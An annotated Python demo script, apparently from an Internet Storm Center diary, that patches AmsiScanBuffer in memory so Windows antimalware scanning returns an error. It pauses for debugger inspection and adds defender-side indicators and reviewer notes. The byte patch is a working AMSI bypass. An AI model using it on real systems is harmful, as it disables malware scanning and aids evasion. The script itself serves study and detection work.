- #
- # Live-patching demo
- # Internet Storm Center - Xavier Mertens
- # 2024/08/29
- #
- # Windows-only demonstration script: it resolves an export of amsi.dll
- # inside this process, overwrites the first bytes of that export, and
- # pauses twice so the change can be observed from an attached debugger.
- # Only the current process's memory is touched; nothing persists on disk.
- # NOTE(review): the paste has lost the indentation of the body line under
- # each `if` below; the structure is reconstructed in the comments.
- from ctypes import windll   # Windows-only: raises ImportError elsewhere
- from ctypes import wintypes
- import ctypes
- import platform
- import sys    # NOTE(review): imported but never used in this script
- import time   # NOTE(review): imported but never used in this script
- # First interactive pause: nothing has been loaded or modified yet.
- print("Attach a debugger to this process and press ENTER when ready")
- input()
- kernel32 = windll.kernel32
- # Explicit argtypes/restype declarations keep pointers and handles full
- # width on 64-bit builds; without them ctypes would default to C int.
- LoadLibraryA = kernel32.LoadLibraryA
- LoadLibraryA.argtypes = [wintypes.LPCSTR]
- LoadLibraryA.restype = wintypes.HMODULE
- GetProcAddress = kernel32.GetProcAddress
- GetProcAddress.argtypes = [wintypes.HMODULE, wintypes.LPCSTR]
- GetProcAddress.restype = ctypes.c_void_p   # returns None when the export is not found
- VirtualProtect = kernel32.VirtualProtect
- VirtualProtect.argtypes = [wintypes.LPVOID, ctypes.c_size_t, wintypes.DWORD, wintypes.PDWORD]
- VirtualProtect.restype = wintypes.BOOL
- RtlMoveMemory = kernel32.RtlMoveMemory
- RtlMoveMemory.argtypes = (wintypes.LPVOID, wintypes.LPVOID, ctypes.c_size_t)
- RtlMoveMemory.restype = wintypes.LPVOID
- # NOTE(review): GetModuleHandleA is declared here but never called below.
- GetModuleHandleA = kernel32.GetModuleHandleA
- GetModuleHandleA.argtypes = [wintypes.LPCSTR]
- GetModuleHandleA.restype = wintypes.HMODULE
- RWX = 0x40 # PAGE_EXECUTE_READ_WRITE
- # The two `if` tests are mutually exclusive, so exactly one `patch` buffer
- # is bound. In both variants the bytes 0x57 0x00 0x07 0x80 are the
- # little-endian value 0x80070057 (the HRESULT E_INVALIDARG), i.e. the
- # patched export returns that error code immediately. The x86 buffer is
- # two bytes longer because it also has to unwind its stdcall arguments.
- if platform.architecture()[0] == '64bit':
- #print('[*] using x64 based patch')
- patch = (ctypes.c_char * 6)(0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
- if platform.architecture()[0] != '64bit':
- #print('[*] using x86 based patch')
- patch = (ctypes.c_char * 8)(0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00)
- # LoadLibraryA maps amsi.dll into this process if it is not already
- # present; GetProcAddress then yields the address of the export.
- # NOTE(review): if the export is not found, p is None and the "%x"
- # format on the next line raises TypeError rather than a clear message.
- p = GetProcAddress(LoadLibraryA(b"amsi"), b"AmsiScanBuffer")
- print("AmsiScanBuffer() found at this address: 0x%x" % p)
- # Second pause: the address is known but still unmodified, so the
- # original prologue can be recorded for comparison.
- print("In the debugger, jump to this address and check the code")
- print("Press ENTER to continue")
- input()
- # Defender's view: this three-call sequence is the observable behaviour —
- # a code page of a loaded module is switched to PAGE_EXECUTE_READWRITE,
- # bytes are copied over the export, and the previous protection is put
- # back. Afterwards the in-memory prologue of the export no longer matches
- # the on-disk amsi.dll image, which is what a debugger or an integrity
- # check can compare. A user-mode RWX transition followed by a write into
- # amsi.dll is a widely documented AMSI-tamper indicator.
- # NOTE(review): neither VirtualProtect call checks its BOOL return, so a
- # failed protection change is not reported before RtlMoveMemory runs.
- oldprotect = wintypes.DWORD(0)
- VirtualProtect(p, ctypes.sizeof(patch), RWX, ctypes.byref(oldprotect))
- RtlMoveMemory(p, patch, ctypes.sizeof(patch))
- # Restores the protection saved above; oldprotect is reused as the output
- # slot and ends up holding the RWX value that was just replaced.
- VirtualProtect(p, ctypes.sizeof(patch), oldprotect, ctypes.byref(oldprotect))
- print("AmsiScanBuffer() successfully patched")
- print("Go back to the previous addresses in the debugger and check the patched code!")
- print("Press ENTER to quit")
- input()